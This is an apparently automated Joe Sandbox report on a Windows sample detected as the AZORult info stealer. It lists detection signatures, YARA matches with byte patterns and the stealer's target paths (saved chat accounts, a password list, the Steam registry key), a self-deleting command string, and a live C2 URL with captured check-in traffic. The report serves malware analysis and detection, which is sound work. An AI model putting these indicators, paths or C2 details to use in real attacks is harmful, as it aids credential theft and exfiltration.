Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8p5iD52knN.exe

Overview

General Information

Sample name:8p5iD52knN.exe
renamed because original name is a hash value
Original sample name:c30e2baf61f34324ccbd0b0168def45e.exe
Analysis ID:1582990
MD5:c30e2baf61f34324ccbd0b0168def45e
SHA1:9ae0549752733b79f244fccb6572792dacd68b50
SHA256:0ac763391fc56711f3df8e6d6c047bd299c2b7052a69fb66a43fcab1c1b74826
Tags:AZORultexeuser-abuse_ch
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8p5iD52knN.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\8p5iD52knN.exe" MD5: C30E2BAF61F34324CCBD0B0168DEF45E)
    • WerFault.exe (PID: 648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
{"C2 url": "http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x1085:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
      • 0xdec0:$a3: %TEMP%\curbuf.dat
      • 0x1a1d4:$a4: PasswordsList.txt
      • 0x151d8:$a5: Software\Valve\Steam
      00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmpAzorult_1Azorult Payloadkevoreilly
      • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
      • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
      Click to see the 8 entries
      SourceRuleDescriptionAuthorStrings
      0.3.8p5iD52knN.exe.5e0000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        0.3.8p5iD52knN.exe.5e0000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          0.3.8p5iD52knN.exe.5e0000.0.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
          • 0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
          • 0xbf78:$a2: %APPDATA%\.purple\accounts.xml
          • 0xc6c0:$a3: %TEMP%\curbuf.dat
          • 0x189d4:$a4: PasswordsList.txt
          • 0x139d8:$a5: Software\Valve\Steam
          0.2.8p5iD52knN.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
            0.2.8p5iD52knN.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
              Click to see the 15 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T10:22:06.950300+010020294671Malware Command and Control Activity Detected192.168.2.44973051.15.241.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T10:22:06.950300+010028102761Malware Command and Control Activity Detected192.168.2.44973051.15.241.16880TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 8p5iD52knN.exeAvira: detected
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php"}
              Source: 8p5iD52knN.exeVirustotal: Detection: 62%Perma Link
              Source: 8p5iD52knN.exeReversingLabs: Detection: 94%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
              Source: 8p5iD52knN.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004094C4 CryptUnprotectData,LocalFree,0_2_004094C4
              Source: 8p5iD52knN.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\8p5iD52knN.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,0_2_0041303C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,0_2_004111C4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,0_2_0041158C
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,0_2_00411590
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,0_2_00412D9C

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 51.15.241.168:80
              Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49730 -> 51.15.241.168:80
              Source: Malware configuration extractorURLs: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php
              Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
              Source: global trafficHTTP traffic detected: POST /AED77D05-A028-477C-B013-04F33F1385C3/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.241.168Content-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 9c 45 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 67 8b 31 11 8b 30 62 8b 30 65 ef 47 11 ed 26 66 9d 26 66 9d Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;1&fEp10l0b0g10b0eG&f&f
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownTCP traffic detected without corresponding DNS query: 51.15.241.168
              Source: unknownHTTP traffic detected: POST /AED77D05-A028-477C-B013-04F33F1385C3/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.241.168Content-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 ec 26 66 9c 45 70 9d 31 14 8b 30 6c 8b 30 62 8b 30 67 8b 31 11 8b 30 62 8b 30 65 ef 47 11 ed 26 66 9d 26 66 9d Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;1&fEp10l0b0g10b0eG&f&f
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.4.5Date: Wed, 01 Jan 2025 09:22:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 571Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.241.168/
              Source: 8p5iD52knN.exe, 00000000.00000003.1735068844.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, 8p5iD52knN.exe, 00000000.00000002.1908661617.000000000066A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.php
              Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpCn
              Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpl
              Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.15.241.168/AED77D05-A028-477C-B013-04F33F1385C3/index.phpmn
              Source: 8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
              Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
              Source: 8p5iD52knN.exe, 8p5iD52knN.exe, 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8p5iD52knN.exe, 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_004381A5 PeekMessageA,GetConsoleAliasesW,CreateNamedPipeA,CreateMemoryResourceNotification,DlgDirSelectComboBoxExW,InsertMenuItemW,AppendMenuW,UnloadKeyboardLayout,SetRectRgn,ExtractAssociatedIconA,ExtractIconEx,FindFirstChangeNotificationW,GetRegisteredRawInputDevices,GetRegisteredRawInputDevices,GetNextDlgGroupItem,CallMsgFilter,OpenClipboard,GetClipboardSequenceNumber,GetLastError,DragQueryFileW,ShellAboutA,LoadMenuIndirectA,LoadIconW,MapVirtualKeyExW,StretchBlt,SetPixel,ShellExecuteA,BeginPaint,GetTickCount,GetSystemTimes,GetCPInfo,GlobalMemoryStatus,GetProcAddress,LoadLibraryA,GlobalAlloc,GlobalAlloc,VirtualProtect,GetStartupInfoW,SetProcessShutdownParameters,GetLastError,GetTickCount,0_2_004381A5

              System Summary

              barindex
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043A01E0_2_0043A01E
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043B9530_2_0043B953
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043C23E0_2_0043C23E
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043B40F0_2_0043B40F
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043C5430_2_0043C543
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043E6D20_2_0043E6D2
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043AEE40_2_0043AEE4
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0043BFC30_2_0043BFC3
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0061F1420_2_0061F142
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: String function: 00403B98 appears 44 times
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: String function: 00404E64 appears 33 times
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: String function: 00404E3C appears 87 times
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: String function: 004062D8 appears 34 times
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: String function: 004034E4 appears 36 times
              Source: C:\Users\user\Desktop\8p5iD52knN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016
              Source: 8p5iD52knN.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_00438763 LoadLibraryA,CreateToolhelp32Snapshot,Module32FirstW,0_2_00438763
              Source: C:\Users\user\Desktop\8p5iD52knN.exeCode function: 0_2_0040A4A4 CoCreateInstance,0_2_0040A4A4
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
              Source: C:\Users\user\Desktop\8p5iD52knN.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-B2F2A972-70ADDC33
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\516182ca-4568-46e9-ba7e-b6d99dee014cJump to behavior
              Source: 8p5iD52knN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\8p5iD52knN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 8p5iD52knN.exeVirustotal: Detection: 62%
              Source: 8p5iD52knN.exeReversingLabs: Detection: 94%
              Source: unknownProcess created: C:\Users\user\Desktop\8p5iD52knN.exe "C:\Users\user\Desktop\8p5iD52knN.exe"
              Source: C:\Users\user\Desktop\8p5iD52knN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: crtdll.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\8p5iD52knN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
